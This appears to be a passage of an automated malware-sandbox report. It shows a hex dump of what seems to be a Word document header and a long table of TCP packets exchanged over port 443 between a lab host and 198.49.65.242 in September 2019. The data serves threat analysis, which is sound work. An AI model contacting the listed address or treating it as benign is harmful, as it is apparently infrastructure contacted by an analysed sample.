Data Raw:	ec a5 c1 00 6b 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 82 0a 00 00 0e 00 62 6a 62 6a 04 ae 04 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 16 00 00 66 c4 5b 66 66 c4 5b 66 82 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 20, 2019 13:30:07.560237885 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:07.685724974 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:07.685929060 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:07.701771021 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:07.827321053 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:07.830837011 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:07.830905914 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:07.831003904 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:07.831084967 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:07.831115007 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:07.831135988 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:07.831199884 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:07.851461887 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:07.977262020 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.238907099 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.436014891 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.567738056 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.567780018 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.567877054 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.567910910 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.568070889 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.568116903 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.568219900 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.568231106 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.568288088 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.568351984 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.568412066 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.568515062 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.568603039 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.568650961 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.693723917 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.693768978 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.693805933 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.693912029 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.694026947 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.694078922 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.694133043 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.694216013 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.694328070 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.694391012 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.694433928 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.694539070 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.694632053 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.694634914 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.694798946 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.694840908 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.694953918 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.694992065 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.695050001 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.695154905 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.695200920 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.695245981 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.695348978 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.695395947 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.695472956 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.695568085 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.695621014 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.698884964 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.819525003 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.819581985 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.819667101 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.819740057 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.819850922 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.819859028 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.820059061 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.820101976 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.820159912 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.820250988 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.820353985 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.820359945 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.820462942 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.820560932 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.820611954 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.820693970 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.820811033 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.820816994 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.820911884 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.820962906 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.821022987 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.821094036 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.821182966 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.821274996 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.821281910 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.821387053 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.821469069 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.821537018 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.821625948 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.821717978 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.821799040 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.821818113 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.821913958 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.821976900 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.822004080 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.822113991 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.822201014 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.822297096 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.822299004 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.822439909 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.822510958 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.822602034 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.822619915 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.822711945 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.822771072 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.822876930 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.822952032 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.823030949 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.823131084 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.823132992 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.824213982 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.824306011 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.824383974 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.826369047 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.945377111 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.945451021 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.945477009 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.945574045 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.945748091 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.945817947 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.945847034 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.945908070 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.945982933 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.946075916 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.946114063 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.946260929 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.946310997 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.946384907 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.946496964 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.946527958 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.946590900 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.946679115 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.946690083 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.946815014 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.946897030 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.947016001 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.947047949 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.947160006 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.947202921 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.947285891 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.947335958 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.947396994 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.947489977 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.947514057 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.947664022 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.947705984 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.947802067 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.947813988 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.947922945 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.948246002 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.948723078 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.948782921 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.948903084 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.949142933 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.951946020 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.951987028 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.952092886 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.952177048 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.952256918 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.952312946 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.952347994 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.952460051 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.952492952 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.952537060 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.952570915 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.952677011 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.952735901 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.952791929 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.952908993 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.952913046 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.953056097 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.953138113 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.953205109 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.953243017 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.953361988 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.953453064 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.953561068 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.953572035 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.953665972 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.953756094 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.953811884 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.953845978 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.953959942 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.954004049 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.954112053 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.954145908 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.954222918 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.954308033 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:08.954332113 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:08.960114956 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.071343899 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.071379900 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.071408987 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.071523905 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.071603060 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.071615934 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.071739912 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.071780920 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.071871042 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.071960926 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.072030067 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.074462891 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.074592113 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.074664116 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.074763060 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.074798107 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.074887991 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.074996948 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.074997902 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.075078011 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.075175047 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.075190067 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.075290918 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.075449944 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.075488091 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.075503111 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.075607061 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.075644016 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.075699091 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.075781107 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.075798988 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.075900078 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.075994968 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.076026917 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.076138973 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.076239109 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.076297998 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.076329947 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.076423883 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.076513052 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.076538086 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.077749014 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.085689068 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.085767031 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.085860014 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.085870028 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.085988045 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.086082935 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.086098909 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.086194992 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.086280107 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.086364031 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.086369991 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.086468935 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.086540937 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.086610079 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.086688995 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.086785078 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.086833954 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.086898088 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.086987019 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.086990118 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.087121010 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.087212086 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.087266922 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.087297916 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.087408066 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.087415934 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.087498903 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.087569952 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.087601900 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.087702036 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.087807894 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.087831974 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.087915897 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.088018894 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.088076115 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.088110924 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.088682890 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.197242022 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.197278023 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.197352886 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.197417021 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.197449923 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.197552919 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.197628021 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.197633028 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.197762012 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.197777033 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.197829962 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.197931051 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.200251102 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.200329065 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.200407982 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.200469017 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.200541019 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.200608969 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.200644016 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.200719118 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.200850010 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.200963020 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.203258038 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.203371048 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.203402042 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.203505993 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.203572035 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.203603983 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.203716040 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.203819036 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.203860998 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.203903913 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.204010010 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.204011917 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.204117060 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.204222918 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.204241037 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.204324961 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.204379082 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.204425097 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.204525948 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.204684973 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.205642939 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.211277962 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.211344957 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.211513996 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.211594105 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.211600065 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216373920 CEST	49163	443	192.168.1.16	198.49.65.242
Sep 20, 2019 13:30:09.216432095 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216460943 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216480970 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216499090 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216516972 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216536045 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216553926 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216572046 CEST	443	49163	198.49.65.242	192.168.1.16
Sep 20, 2019 13:30:09.216589928 CEST	443	49163	198.49.65.242	192.168.1.16
